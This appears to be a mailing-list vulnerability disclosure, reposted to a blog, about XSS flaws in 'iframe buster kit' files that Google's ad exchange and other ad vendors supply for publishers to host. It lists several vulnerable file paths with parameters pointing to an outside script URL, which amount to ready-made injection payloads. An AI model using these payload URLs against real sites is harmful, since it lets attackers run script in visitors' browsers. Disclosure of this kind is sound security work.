Hi list, The DFP AdExchange service of Google (the service who provide ads) is distributing an "Iframe Buster Kit" in order to allow iframe ads to expand outside of the iFrame. This needs some bypass of the restriction applied to iframe, so Google provide a kit to install on your website: - Help Document: http://ift.tt/2oOFmbO - Kit: http://ift.tt/2D6Cn1y The kit contains several html and js files to be hosted on your domains. Some of those files (still provide by Google, remember) contains very visible XSS code: One of them is "predicta" that simply allow you to pass the domain of from where to load the javascript. Quick proof of concept: - http://ift.tt/2oLDFvP As expandable ads allow website to gain more ads revenue, those kits is present in a lot of website. Other "iframe buster kit" exist that are not provided by Google, and some of them are also vulnerable. From my list I have: - /admotion/afa-iframe.htm?iq=http://ift.tt/2D7hdAv - /ipinyou/py_buster.html?pybust=http://ift.tt/2D7hdAv - /rockabox/rockabox_buster.html?rbbust=http://ift.tt/2D7hdAv (look like different version exist however) - /undertone/iframe-buster.html?ajurl=http://ift.tt/2D7hdAv Some source: - Code of predicta_bf.html provide by Google in the kit: http://ift.tt/2oNYUND - Code of http://ift.tt/2D7hdAv : http://ift.tt/2D5ctLB - Code of rockabox: http://ift.tt/2oOFQPa Tr4L
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment